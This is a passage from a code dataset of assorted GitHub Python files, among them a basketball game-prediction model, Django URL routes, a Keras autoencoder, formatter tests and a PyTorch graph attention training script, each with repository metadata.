[Y/n] \")\n\nif PERMISSION == 'Y':\n try:\n nltk.download('all')\n COMPLETE = \"\"\"We have completed the initial setup for ntlk download.\n You can now run bigramft.py\"\"\"\n print('\\n', COMPLETE, '\\n')\n except Exception as error:\n print('There was an error: ', error)\nelse:\n EXIT_MSG = \"\"\"No worries we can have some bigram fun later when your ready to setup.\n Never rush quality!\"\"\"\n print(EXIT_MSG)\n","repo_name":"Yakelixir/bigram_from_text","sub_path":"nltk_setup.py","file_name":"nltk_setup.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1181040007","text":"import functools\nfrom datetime import datetime\nimport time\nfrom typing import Callable\n\n\ndef timer(cls, func: Callable, date_format: str) -> Callable:\n \"\"\"\n Декоратор класса.\n Выводит время создания инстанса класса.\n Выводит время работы функции или метода.\n \"\"\"\n @functools.wraps(func)\n def wrapped(*args, **kwargs):\n sample = date_format\n for sym in sample:\n if sym.isalpha():\n sample = sample.replace(sym, '%' + sym)\n\n print(f\"Запускается '{cls.__name__}.{func.__name__}'. Дата и время запуска: {datetime.now().strftime(sample)}\")\n start = time.time()\n result = func(*args, **kwargs)\n end = time.time()\n print(f\"Завершение '{cls.__name__}.{func.__name__}', время работы = {round(end - start, 3)} сек.\")\n return result\n\n return wrapped\n\n\ndef log_methods(date_format: str) -> Callable:\n \"\"\"\n Декоратор класса.\n Получает другой декоратор и применяет его ко всем методам в классе(класса).\n \"\"\"\n def decorate(cls):\n for method in dir(cls):\n if not method.startswith('__'):\n current_method = getattr(cls, method)\n decorated_method = timer(cls, current_method, date_format)\n setattr(cls, method, decorated_method)\n return cls\n\n return decorate\n\n\n@log_methods(\"b d Y - H:M:S\")\nclass A:\n def test_sum_1(self) -> int:\n print('test sum 1')\n number = 100\n result = 0\n for _ in range(number + 1):\n result += sum([i_num ** 2 for i_num in range(10000)])\n\n return result\n\n\n@log_methods(\"b d Y - H:M:S\")\nclass B(A):\n def test_sum_1(self):\n super().test_sum_1()\n print(\"Наследник test sum 1\")\n\n def test_sum_2(self):\n print(\"test sum 2\")\n number = 200\n result = 0\n for _ in range(number + 1):\n result += sum([i_num ** 2 for i_num in range(10000)])\n\n return result\n\n\nmy_obj = B()\nmy_obj.test_sum_1()\nmy_obj.test_sum_2()\n\n# зачет!\n","repo_name":"Mihalich2981/Python","sub_path":"Module29/03_format_logging/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73098474028","text":"import csv\nimport string\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\n\nclass Team():\n\n def __init__(self, team_name = \"League Average\", playoffs_year = 2020):\n\n team_statsheet = str(playoffs_year) + '_team_per_game_stats' + '.csv'\n opponent_statsheet = str(playoffs_year) + '_opp_team_per_game_stats' + '.csv'\n\n with open(team_statsheet) as file:\n team_stats = csv.reader(file)\n\n self.loaded_info = False\n\n for team in team_stats:\n name = team[1].replace('*','')\n if name == team_name:\n self.name = name\n self.minutes_played = float(team[3])\n self.field_goals_attempted = float(team[5])\n self.three_points_made = float(team[7])\n self.two_points_made = float(team[10])\n self.free_throws_made = float(team[13])\n 
self.free_throws_attempted = float(team[14])\n self.o_rebound = float(team[16])\n self.d_rebound = float(team[17])\n self.steals = float(team[20])\n self.blocks = float(team[21])\n self.turnovers = float(team[22])\n self.fouls = float(team[23])\n self.points = float(team[24])\n\n self.loaded_info = True\n\n if not self.loaded_info:\n print(\"Could not find team\")\n\n with open(opponent_statsheet) as file:\n opp_team_stats = csv.reader(file)\n\n self.loaded_info = False\n\n for team in opp_team_stats:\n name = team[1].replace('*','')\n if name == team_name:\n self.opp_field_goals_attempted = float(team[5])\n self.opp_three_points_made = float(team[7])\n self.opp_two_points_made = float(team[10])\n self.opp_free_throws_made = float(team[13])\n self.opp_free_throws_attempted = float(team[14])\n self.opp_o_rebound = float(team[16])\n self.opp_d_rebound = float(team[17])\n self.opp_steals = float(team[20])\n self.opp_turnovers = float(team[22])\n self.opp_fouls = float(team[23])\n self.opp_points = float(team[24])\n\n self.loaded_info = True\n\n if not self.loaded_info:\n print(\"Could not find team matchups\")\n\n self.offensive_eFG = (self.two_points_made + 1.5 * self.three_points_made) / self.field_goals_attempted\n self.defensive_eFG = (self.opp_two_points_made + 1.5 * self.opp_three_points_made) / self.opp_field_goals_attempted\n\n self.offensive_TOV_rate = self.turnovers / (self.field_goals_attempted + .44 * self.free_throws_attempted + self.turnovers)\n self.defensive_TOV_rate = self.opp_turnovers / (self.opp_field_goals_attempted + .44 * self.opp_free_throws_attempted + self.opp_turnovers)\n\n self.free_throw_rate = self.free_throws_made / self.free_throws_attempted\n\n self.o_rebound_rating = self.o_rebound / (self.o_rebound + self.opp_d_rebound)\n self.opp_o_rebound_rating = self.opp_o_rebound / (self.d_rebound + self.opp_o_rebound)\n self.d_rebound_rating = 1 - self.opp_o_rebound_rating\n\n #Four Factors\n self.shooting_factor = self.offensive_eFG - self.defensive_eFG\n self.turnover_factor = self.defensive_TOV_rate - self.offensive_TOV_rate\n self.rebounding_factor = self.o_rebound_rating - self.opp_o_rebound_rating\n self.free_throw_factor = self.free_throw_rate\n\n self.net_rating = self.shooting_factor * .4 * 100 + self.turnover_factor * .25 * 100 + self.rebounding_factor * .2 * 100 + self.free_throw_factor * .15\n # Note: net_rating is roughly accurate, but too severely penalizes team focused on shooting such as the Rockets and the Thunder while\n # inflating teams who score in the paint such as the 76ers and the Lakers\n\n # self.defensive_rating = (self.defensive_TOV_rate * 100 * .25 + self.d_rebound_rating * 100 * .25 - self.defensive_eFG * 100 * .4 + (self.steals + self.blocks) / (self.opp_field_goals_attempted + self.opp_turnovers) * 100 * .1)\n self.defensive_rating = (self.defensive_TOV_rate * 100 * .30 + self.d_rebound_rating * 100 * .20 - self.defensive_eFG * 100 * .4 + (self.steals + self.blocks) / (self.opp_field_goals_attempted + self.opp_turnovers) * 100 * .1) + 4\n self.offensive_rating = (self.offensive_eFG * 100 * .4 + self.o_rebound_rating * 100 * .20 + self.free_throw_rate * 100 * .05 - self.offensive_TOV_rate * 100 * .25) / 8\n # Defensive rating ranks teams properly, but scale seems difficult to manage\n # Offensive rating seems to have very limited use\n\n self.game_pace = self.field_goals_attempted + self.opp_field_goals_attempted\n self.shooting_possessions = (1 / (1 - self.o_rebound_rating)) / ((1 / (1 - self.o_rebound_rating)) + (1 / (1 - 
self.opp_o_rebound_rating))) * self.game_pace + (self.steals - self.opp_steals) - (self.turnovers - self.opp_turnovers) * (18 / 21) - (self.fouls - self.opp_fouls) / 4\n\n self.calculated_ppg = self.shooting_possessions * self.offensive_eFG * 2 + self.free_throws_made\n # self.calculated_ppg = self.field_goals_attempted * self.offensive_eFG * 2 + self.free_throws_made\n # different ways to calculate ppg\n\n #for diagnostics\n self.shooting_possessions_diff = self.field_goals_attempted - self.shooting_possessions\n self.calculated_ppg_diff = self.points - self.calculated_ppg\n # appears as if I am overrating the good teams and underrating the bad ones\n # implementing a defensive factor into the calculated PPG might help\n\n def __str__(self):\n # return(\"Team stats for {}\".format(self.name))\n # return(\" Calculated PPG Difference: {}, Shooting Posessions Difference: {}\".format(self.calculated_ppg_diff, self.shooting_possessions_diff))\n return (\" Net Rating: {}\".format(self.net_rating))\n\ndef generate_teams():\n\n team_dict = dict()\n\n with open('team_per_game_stats_2020.csv') as file:\n teams = csv.DictReader(file)\n for team in teams:\n team_name = team['Team'].replace(\"*\",'')\n mascot = team_name.split()[-1]\n team_dict[mascot] = Team(team_name)\n\n return team_dict\n\ndef sort_teams(team_dict):\n\n team_ranking = {key: value for key, value in sorted(team_dict.items(), key=lambda item: item[1].net_rating, reverse=True)}\n\n return team_ranking\n\ndef calculate_defensive_factor_ratio(team_dict):\n\n defensive_rating = []\n opponent_points = []\n\n for team in team_dict.values():\n defensive_rating.append(team.defensive_rating)\n opponent_points.append(float(team.opp_points/team.minutes_played - team_dict['Average'].opp_points/team_dict['Average'].minutes_played) * 240)\n\n x = np.array(defensive_rating).reshape(-1,1)\n y = np.array(opponent_points)\n\n model = LinearRegression().fit(x, y)\n # model = LinearRegression(fit_intercept=False).fit(x, y)\n\n r_sq = model.score(x,y)\n intercept = model.intercept_\n slope = model.coef_\n\n # print('Points Scored Difference = {} * Defensive Rating + {}'.format(slope, intercept))\n return r_sq, intercept, slope\n\ndef calculate_matchup_points(team1, team2):\n # Without factoring in OT minutes: Points Scored Difference = [-2.71860127] * Defensive Rating + 9.201332686838144\n # Factoring in OT Minutes: Points Scored Difference = [-2.57157722] * Defensive Rating + 8.712697490051784\n\n game_pace = team1.field_goals_attempted + team2.field_goals_attempted\n\n # Team 1\n team1_shooting_possessions = (1 / (1 - team1.o_rebound_rating)) / ((1 / (1 - team1.o_rebound_rating)) + (1 / (1 - team2.opp_o_rebound_rating))) * game_pace + (team1.steals - team2.opp_steals) - (team1.turnovers - team2.opp_turnovers) * (18 / 21) - (team1.fouls - team2.opp_fouls) / 4\n team2_defense_effect = -2.57157722 * team2.defensive_rating + 8.712697490051784\n team1_game_points = team1.shooting_possessions * team1.offensive_eFG * 2 + team1.free_throws_made + team2_defense_effect\n # team1_game_points = team1.field_goals_attempted * team1.offensive_eFG * 2 + team1.free_throws_made + team2_defense_effect\n\n # print(\"{} shooting possessions: {}\".format(team1.name, team1_shooting_possessions))\n # print(\"{} defense effect: {}\".format(team2.name, team2_defense_effect))\n # print(\"{} game points: {}\".format(team1.name, team1_game_points))\n\n # Team 2\n team2_shooting_possessions = (1 / (1 - team2.o_rebound_rating)) / ((1 / (1 - team1.o_rebound_rating)) + (1 / (1 - 
team2.opp_o_rebound_rating))) * game_pace + (team2.steals - team1.opp_steals) - (team2.turnovers - team1.opp_turnovers) * (18 / 21) - (team2.fouls - team1.opp_fouls) / 4\n team1_defense_effect = -2.57157722 * team1.defensive_rating + 8.712697490051784\n team2_game_points = team2.shooting_possessions * team2.offensive_eFG * 2 + team2.free_throws_made + team1_defense_effect\n # team2_game_points = team2.field_goals_attempted * team2.offensive_eFG * 2 + team2.free_throws_made + team1_defense_effect\n\n # print(\"{} shooting possessions: {}\".format(team2.name, team2_shooting_possessions))\n # print(\"{} defense effect: {}\".format(team1.name, team1_defense_effect))\n # print(\"{} game points: {}\".format(team2.name, team2_game_points))\n\n total_game_points = team1_game_points + team2_game_points\n\n if team1_game_points > team2_game_points:\n winner = team1.name\n loser = team2.name\n spread = team2_game_points - team1_game_points\n winner_points = team1_game_points\n loser_points = team2_game_points\n else:\n winner = team2.name\n loser = team1.name\n spread = team1_game_points - team2_game_points\n winner_points = team2_game_points\n loser_points = team1_game_points\n\n return winner, loser, spread, winner_points, loser_points\n\ndef calculate_matchup_FF_spread(team1, team2):\n\n game_pace = team1.field_goals_attempted + team2.field_goals_attempted\n\n # Team 1\n team1_shooting_possessions = (1 / (1 - team1.o_rebound_rating)) / ((1 / (1 - team1.o_rebound_rating)) + (1 / (1 - team2.opp_o_rebound_rating))) * game_pace + (team1.steals - team2.opp_steals) - (team1.turnovers - team2.opp_turnovers) * (18 / 21) - (team1.fouls - team2.opp_fouls) / 4\n team2_defense_effect = -2.57157722 * team2.defensive_rating + 8.712697490051784\n team1_game_points = team1.shooting_possessions * team1.offensive_eFG * 2 + team1.free_throws_made + team2_defense_effect\n # team1_game_points = team1.field_goals_attempted * team1.offensive_eFG * 2 + team1.free_throws_made + team2_defense_effect\n\n # print(\"{} shooting possessions: {}\".format(team1.name, team1_shooting_possessions))\n # print(\"{} defense effect: {}\".format(team2.name, team2_defense_effect))\n # print(\"{} game points: {}\".format(team1.name, team1_game_points))\n\n # Team 2\n team2_shooting_possessions = (1 / (1 - team2.o_rebound_rating)) / ((1 / (1 - team1.o_rebound_rating)) + (1 / (1 - team2.opp_o_rebound_rating))) * game_pace + (team2.steals - team1.opp_steals) - (team2.turnovers - team1.opp_turnovers) * (18 / 21) - (team2.fouls - team1.opp_fouls) / 4\n team1_defense_effect = -2.57157722 * team1.defensive_rating + 8.712697490051784\n team2_game_points = team2.shooting_possessions * team2.offensive_eFG * 2 + team2.free_throws_made + team1_defense_effect\n # team2_game_points = team2.field_goals_attempted * team2.offensive_eFG * 2 + team2.free_throws_made + team1_defense_effect\n\n # print(\"{} shooting possessions: {}\".format(team2.name, team2_shooting_possessions))\n # print(\"{} defense effect: {}\".format(team1.name, team1_defense_effect))\n # print(\"{} game points: {}\".format(team2.name, team2_game_points))\n\n total_game_points = team1_game_points + team2_game_points\n\n # ff_spread = ((team1.shooting_factor - team2.shooting_factor) * .4 + (team1.turnover_factor - team2.turnover_factor) * .25 + (team1.rebounding_factor - team2.rebounding_factor) * .2 + (team1.free_throw_rate - team2.free_throw_rate) * 100 * .15) * 2\n # print(\"Team1 net rating: {}\".format(team1.net_rating))\n # print(\"Team2 net rating: {}\".format(team2.net_rating))\n 
ff_spread = (team1.net_rating - team2.net_rating) * 2\n # print(\"ff_spread: {}\".format(ff_spread))\n\n if ff_spread > 0:\n winner = team1.name\n loser = team2.name\n spread = -1 * ff_spread\n winner_points = (total_game_points - ff_spread) / 2 + ff_spread\n loser_points = (total_game_points - ff_spread) / 2\n else:\n winner = team2.name\n loser = team1.name\n spread = ff_spread\n winner_points = (total_game_points + ff_spread) / 2 - ff_spread\n loser_points = (total_game_points + ff_spread) / 2\n\n return winner, loser, spread, winner_points, loser_points\n\ndef testing_schedule(year = 2020, month = 'february'):\n\n schedule_name = month + '_schedule_' + str(year) + '.csv'\n\n test_result = dict()\n test_result['right'] = 0\n test_result['wrong'] = 0\n\n spread_difference = list()\n\n point_total_difference = list()\n\n team_dict = generate_teams()\n\n with open(schedule_name) as schedule:\n matchup_reader = csv.reader(schedule)\n next(matchup_reader)\n\n for matchup in matchup_reader:\n visiting_team = matchup[2]\n visiting_team_points = matchup[3]\n home_team = matchup[4]\n home_team_points = matchup[5]\n actual_point_total = int(visiting_team_points) + int(home_team_points)\n\n if visiting_team_points > home_team_points:\n win = visiting_team\n loss = home_team\n actual_spread = int(visiting_team_points) - int(home_team_points)\n winner_points = visiting_team_points\n loser_points = home_team_points\n else:\n win = home_team\n loss = visiting_team\n actual_spread = int(home_team_points) - int(visiting_team_points)\n winner_points = home_team_points\n loser_points = visiting_team_points\n\n visitor_mascot = visiting_team.split()[-1]\n home_mascot = home_team.split()[-1]\n visitors = team_dict[visitor_mascot]\n home = team_dict[home_mascot]\n\n # predicted_winner, predicted_loser, predicted_spread, predicted_winner_points, predicted_loser_points = calculate_matchup_points(visitors, home)\n predicted_winner, predicted_loser, predicted_spread, predicted_winner_points, predicted_loser_points = calculate_matchup_FF_spread(visitors, home)\n predicted_point_total = predicted_winner_points + predicted_loser_points\n\n if predicted_winner == win:\n test_result['right'] += 1\n else:\n test_result['wrong'] += 1\n predicted_spread = -1 * predicted_spread\n\n spread_difference.append(actual_spread - predicted_spread)\n point_total_difference.append(actual_point_total - predicted_point_total)\n\n correct_percentage = test_result['right'] / (test_result['right'] + test_result['wrong']) * 100\n average_spread_difference = sum(spread_difference) / len(spread_difference)\n average_point_total_difference = sum(point_total_difference) / len(point_total_difference)\n\n return correct_percentage, average_spread_difference, average_point_total_difference\n","repo_name":"colwang/basketball-model","sub_path":"CSV Model/basic_model_functions.py","file_name":"basic_model_functions.py","file_ext":"py","file_size_in_byte":15678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14553656776","text":"'''\nCreated on Aug 29, 2017\n\n@author: kenng\n'''\n#from django.conf.urls import url\napp_name = 'polls'\nfrom django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n #url(r'^$', views.index, name='index'),\n # ex: /polls/\n path('', views.index, name='index'),\n # ex: /polls/5/\n path('<int:question_id>/', views.detail, name='detail'),\n # ex: /polls/5/results/\n path('<int:pk>/results/', views.ResultsView.as_view(), name='results'),\n # ex: /polls/5/vote/\n path('<int:question_id>/vote/', views.vote, name='vote'),\n]","repo_name":"kent5i5/kitsportfolio","sub_path":"polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"33688866869","text":"#----------------------- -------------------------------------\n# coding:utf-8\n#------------------------------------------------------------\n#\tUpdate History\n#\tDecember 06 16:00, 2018 (Thu) by S.Iwamaru\n#------------------------------------------------------------\n#\n#\tDeepAutoEncoder\n#\t\thttps://blog.keras.io/building-autoencoders-in-keras.html\n#------------------------------------------------------------\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom keras.layers import Input, Dense\nfrom keras.models import Model\nfrom keras.datasets import mnist\nfrom keras.utils import plot_model\n\n\"\"\"\n\tBuild the model\n\"\"\"\ninput_img = Input(shape=(784,))\n\n# Encoder part\nencoded = Dense(128, activation=\"relu\")(input_img)\nencoded = Dense(64, activation=\"relu\")(encoded)\nencoded = Dense(32, activation=\"relu\")(encoded)\n\n# Decoder part\ndecoded = Dense(64, activation=\"relu\")(encoded)\ndecoded = Dense(128, activation=\"relu\")(decoded)\ndecoded = Dense(784, activation=\"sigmoid\")(decoded)\n\n# Model\nautoencoder = Model(input_img, decoded)\nautoencoder.compile(optimizer=\"adadelta\",\n\t\t\t\t\tloss=\"binary_crossentropy\")\n\n# Visualize the architecture\nplot_model( autoencoder, to_file=\"architecture.png\" )\n\n\"\"\"\n\tLoad the data\n\"\"\"\n(x_train, _), (x_test, _) = mnist.load_data()\n\nx_train = x_train.astype(\"float32\") / 255.\nx_test = x_test.astype(\"float32\") / 255.\nx_train = x_train.reshape((len(x_train), np.prod(x_train.shape[1:])))\nx_test = x_test.reshape((len(x_test), np.prod(x_test.shape[1:])))\n\nepochs = 100\nbatch_size = 256\n\nautoencoder.fit( x_train, x_train,\n\t\tepochs=epochs,\n\t\tbatch_size=batch_size,\n\t\tshuffle=True,\n\t\tvalidation_data=(x_test, x_test))\n\t\t\t\t \n\"\"\"\n\tVisualize the data\n\"\"\"\ndecoded_imgs = autoencoder.predict(x_test)\n\nn = 10\nplt.figure(figsize=(20, 4))\nfor i in range(n):\n\t# display original\n\tax = plt.subplot(2, n, i + 1)\n\tplt.imshow(x_test[i].reshape(28, 28))\n\tplt.gray()\n\tax.get_xaxis().set_visible(False)\n\tax.get_yaxis().set_visible(False)\n\t\n\tax = plt.subplot(2, n, i + 1 + n)\n\tplt.imshow(decoded_imgs[i].reshape(28, 28))\n\tplt.gray()\n\tax.get_xaxis().set_visible(False)\n\tax.get_yaxis().set_visible(False)\nplt.show()\n","repo_name":"Shimpei-GANGAN/AutoEncoder-DenoisingAE","sub_path":"DeepAE.py","file_name":"DeepAE.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"22612614417","text":"# -*- coding: utf-8 -*-\n\n'''\nCreated on 16.04.15\n\n@author = mharder\n'''\n\n\nimport six\n\nfrom bonfire.formats import tail_format, dump_format\nfrom bonfire.graylog_api import Message\nimport arrow\n\n\ndef test_dump_format():\n ts = arrow.get()\n ts_str = ts.to('local').format(\"YYYY-MM-DD HH:mm:ss.SS\")\n formatter = dump_format([\"a\", \"b\", \"c\"])\n\n assert formatter(Message({\"timestamp\": ts, \"message\": {}})) == 
\"{};'';'';''\".format(ts_str)\n assert formatter(Message({\"timestamp\": ts, \"message\": {\"a\": \"d\"}})) == \"{};'d';'';''\".format(ts_str)\n assert formatter(Message({\"timestamp\": ts, \"message\": {\"a\": \"d\", \"b\": \"e\", \"c\": \"f\"}})) == \"{};'d';'e';'f'\".format(ts_str)\n assert formatter(Message({\"timestamp\": ts, \"message\": {\"a\": \"d\", \"b\": \"e\", \"c\": \"f\", \"g\": \"h\"}})) == \"{};'d';'e';'f'\".format(ts_str)\n\n\ndef test_tail_format():\n arrow_time = arrow.get()\n timestamp = arrow_time.to('local').format(\"YYYY-MM-DD HH:mm:ss.SS\")\n\n message = {\n \"message\": \"Hällo Wörld, Здравствулте мир, γειά σου κόσμος\",\n \"source\": \"a\",\n \"level\": 2,\n \"facility\": \"b\",\n \"line\": 10,\n \"module\": \"c\",\n \"timestamp\": arrow_time\n }\n\n default_formatter = tail_format([\"message\"])\n default_expected_result = f\"{timestamp} '{message['message']}'\"\n assert default_formatter(Message({\"message\": message})) == default_expected_result\n\n source_formatter = tail_format([\"message\", \"source\"])\n source_expected_result = f\"{timestamp} '{message['message']}' '{message['source']}'\"\n assert source_formatter(Message({\"message\": message})) == source_expected_result\n\n varied_formatter = tail_format([\"line\", \"source\", \"level\"])\n varied_expected_result = f\"{timestamp} '{message['line']}' '{message['source']}' '{message['level']}'\"\n assert varied_formatter(Message({\"message\": message})) == varied_expected_result\n\n\n colorful_default_formatter = tail_format([\"message\"], True)\n colors = [\"\\x1b[41m\\x1b[37m\", \"\\x1b[31m\", \"\\x1b[33m\", \"\\x1b[32m\", \"\\x1b[32m\", \"\\x1b[34m\"]\n\n def do_colorful_test(formatter, message, expected_result, level):\n message[\"level\"] = level\n assert formatter(Message({\"message\": message})) == expected_result\n\n for level in range(2,8):\n expected_result = \"{}{} '{}'\\x1b[0m\".format(colors[level-2], timestamp, message['message'])\n do_colorful_test(colorful_default_formatter, message, expected_result, level)\n","repo_name":"blue-yonder/bonfire","sub_path":"tests/test_formats.py","file_name":"test_formats.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"37"} +{"seq_id":"32035719290","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path(\"\", views.HomeView.as_view(), name=\"home\"),\n path(\"songs/\", views.SongsView.as_view(), name=\"songs\"),\n path(\"songs/create/\", views.CreateSongsView.as_view(), name=\"add_song\"),\n path(\"songs//update/\", views.UpdateSongsView.as_view(), name=\"update_song\"),\n # path(\"songs//update/\", views.UpdateSongsView.as_view(), name=\"update_song\"),\n path(\"songs//delete/\", views.DeleteSongsView.as_view(), name=\"delete_song\"),\n path(\"songs/search//\", views.song_search_view, name=\"song_search\"),\n # path(\"songs//details/\", views.SongDetailsView.as_view(), name=\"song_details\"),\n\n path(\"artists/\", views.ArtistsView.as_view(), name=\"artists\"),\n path(\"artists/create/\", views.CreateArtistsView.as_view(), name=\"add_artist\"),\n path(\"artists//update/\", views.UpdateArtistsView.as_view(), name=\"update_artist\"),\n path(\"artists//delete/\", views.DeleteArtistsView.as_view(), name=\"delete_artist\"),\n path(\"artists/search//\", views.artist_search_view, name=\"artist_search\"),\n\n path(\"albums/\", views.AlbumsView.as_view(), name=\"albums\"), \n path(\"albums/create/\", views.CreateAlbumsView.as_view(), name=\"add_album\"),\n path(\"albums//update/\", views.UpdateAlbumsView.as_view(), name=\"update_album\"),\n path(\"albums//delete/\", views.DeleteAlbumsView.as_view(), name=\"delete_album\"),\n\n]","repo_name":"festus-kogo/artists","sub_path":"artistsapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19762416753","text":"import cv2\n\n# Load image\n#center_image = cv2.cvtColor(cv2.imread('./IMG/center_2016_12_01_13_30_48_287.jpg'), cv2.COLOR_BGR2RGB)\ncenter_image = cv2.imread('./IMG/center_2016_12_01_13_30_48_287.jpg') #convertion to rgb messes it up here but required in drive.py\n\n# Trim image upper side\nFROM_TOP = 60\nFROM_BOTTOM = 20\noutput = center_image[0 + FROM_TOP : 160 - FROM_BOTTOM, 0 : 320, 0 : 3]\n\n# Save image\n#cv2.imwrite('./IMG/center_cropped.jpg', output) \n\n### ------------------------------------------------------------\n\nnew_size_x, new_size_y = 200, 66\nold_size_x, old_size_y = 320, 160\n\ncenter2 = cv2.imread('./IMG/center_2016_12_01_13_30_48_287.jpg')\nFROM_TOP = 60\nFROM_BOTTOM = 20\n\noutput2 = center2[0 + FROM_TOP : old_size_y - FROM_BOTTOM, 0 : old_size_x, 0 : 3]\n\noutput2 = cv2.resize(output2, (new_size_x, new_size_y), interpolation = cv2.INTER_AREA)\ncv2.imwrite('./IMG/center_cropped.jpg', output2) \n\n### ------------------------------------------------------------\n# Test drive.py\nimport base64\nfrom PIL import Image\nfrom io import BytesIO\n\n#image = Image.open(BytesIO(base64.b64decode(imgString)))\nimage = Image.open('./IMG/center_2016_12_01_13_30_48_287.jpg')\n# left, upper, righ, lower\nimage = image.crop((0, FROM_TOP, 320, 160 - FROM_BOTTOM))\nimage = image.resize((200, 66))\n\n# left, left + width, upper, upper+height\nimage.save('./IMG/center_cropped_drivepy.jpg')\n#image_array = np.asarray(image)\n\n\n","repo_name":"drugescu/behavioral_cloning","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43586054678","text":"from __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport glob\nimport sys\nimport time\nimport random\nimport argparse\nimport numpy as np\nimport 
torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\nfrom utils import load_data, accuracy, statics, load_dataset\nfrom models import GAT, SpGAT, GConvAT, CNNBaseline, BrainDecode\n\n# Training settings\nparser = argparse.ArgumentParser()\nparser.add_argument('--no-cuda', action='store_true', default=False, help='Disables CUDA training.')\nparser.add_argument('--fastmode', action='store_true', default=False, help='Validate during training pass.')\nparser.add_argument('--no-log', action='store_true', default=False, help='Print to stdout or log file')\nparser.add_argument('--sparse', action='store_true', default=False, help='GAT with sparse version or not.')\nparser.add_argument('--seed', type=int, default=72, help='Random seed.')\nparser.add_argument('--epochs', type=int, default=1000, help='Number of epochs to train.')\nparser.add_argument('--batch', type=int, default=64, help='Number of samples in a mini batch.')\nparser.add_argument('--lr', type=float, default=0.001, help='Initial learning rate.')\nparser.add_argument('--weight_decay', type=float, default=5e-4, help='Weight decay (L2 loss on parameters).')\nparser.add_argument('--hidden', type=int, default=4, help='Number of hidden units.')\nparser.add_argument('--nb_heads', type=int, default=4, help='Number of head attentions.')\nparser.add_argument('--dropout', type=float, default=0.1, help='Dropout rate (1 - keep probability).') # this is important\nparser.add_argument('--alpha', type=float, default=0.2, help='Alpha for the leaky_relu.')\nparser.add_argument('--patience', type=int, default=100, help='Patience')\n\nargs = parser.parse_args()\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\n\nrandom.seed(args.seed)\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\nif args.cuda:\n torch.cuda.manual_seed(args.seed)\n args.device = torch.device('cuda:0')\n torch.cuda.set_device(0)\nelse:\n args.device = torch.device('cpu')\n\n\ndef train(epoch):\n batch = args.batch\n output_epoch = []\n loss_epoch = []\n t = time.time()\n model.train()\n for idx in range(0, len(x_train), batch):\n features = Variable(torch.FloatTensor(x_train[idx:idx+batch])).to(args.device)\n adj = Variable(torch.FloatTensor(np.ones([features.shape[0], features.shape[1], features.shape[1]]))).to(args.device)\n labels = Variable(torch.LongTensor(y_train[idx:idx+batch])).to(args.device)\n optimizer.zero_grad()\n # forward\n output = model(features, adj)\n #output_epoch.append(output.data.numpy())\n output = output.view(-1, 2)\n labels = labels.view(-1)\n\n # backward\n loss_train = F.nll_loss(output, labels)\n loss_epoch.append(loss_train.data.item())\n acc_train = accuracy(output, labels)\n loss_train.backward()\n optimizer.step()\n if int(idx/batch) % 10 ==0: # print log per 10 batches\n print(\n 'Batch {:d}'.format(int(idx/batch)+1),\n 'loss_train: {:.4f}'.format(loss_train.data.item()),\n 'acc_train: {:.4f}'.format(acc_train.data.item()),\n file=log_file,\n flush=True\n )\n\n # test\n features = Variable(torch.FloatTensor(x_test)).to(args.device)\n adj = Variable(torch.FloatTensor(np.ones([features.shape[0], features.shape[1], features.shape[1]]))).to(args.device)\n labels = Variable(torch.LongTensor(y_test)).to(args.device)\n\n if not args.fastmode:\n # Evaluate validation set performance separately,\n # deactivates dropout during validation run.\n model.eval()\n output = []\n for idx in range(0, len(x_test), batch):\n features_ = features[idx:idx+batch]\n adj_ = 
adj[idx:idx+batch]\n output.append(model(features_, adj_).detach())\n output = torch.cat(output, dim=0)\n\n output = output.view(-1, 2)\n labels = labels.view(-1)\n loss_val = F.nll_loss(output, labels)\n acc_val = accuracy(output, labels)\n print('Epoch: {:04d}'.format(epoch+1),\n 'loss_train: {:.4f}'.format(np.mean(np.array(loss_epoch))),\n '-- loss_val: {:.4f}'.format(loss_val.data.item()),\n 'acc_val: {:.4f}'.format(acc_val.data.item()),\n 'time: {:.4f}s'.format(time.time() - t),\n file=log_file,\n flush=True\n )\n\n return -acc_val.data.item()\n\n\ndef compute_test():\n features = Variable(torch.FloatTensor(x_test)).to(args.device)\n adj = Variable(torch.FloatTensor(np.ones([features.shape[0], features.shape[1], features.shape[1]]))).to(args.device)\n labels = Variable(torch.LongTensor(y_test)).to(args.device)\n\n model.eval()\n output = model(features, adj)\n output = output.view(-1, 2).detach()\n labels = labels.view(-1)\n loss_test = F.nll_loss(output, labels)\n tp, tn, fp, fn = statics(output, labels)\n print(\"Test set results:\",\n \"loss= {:.4f}\".format(loss_test.data.item()),\n \"accuracy= {:.4f}\".format((tp + tn) / (tp + fp + tn + fn)),\n \"sensitivity= {:.4f}\".format(tp / (tp + fn)),\n \"specificity= {:.4f}\".format(tn / (tn + fp)),\n file=log_file,\n flush=True\n )\n\nif __name__=='__main__':\n # Load data\n X, Y = load_dataset(args.seed)\n split_rate = 0.8\n x_train = X[0:int(split_rate * X.shape[0])]\n x_test = X[int(split_rate * X.shape[0]):]\n\n y_train = 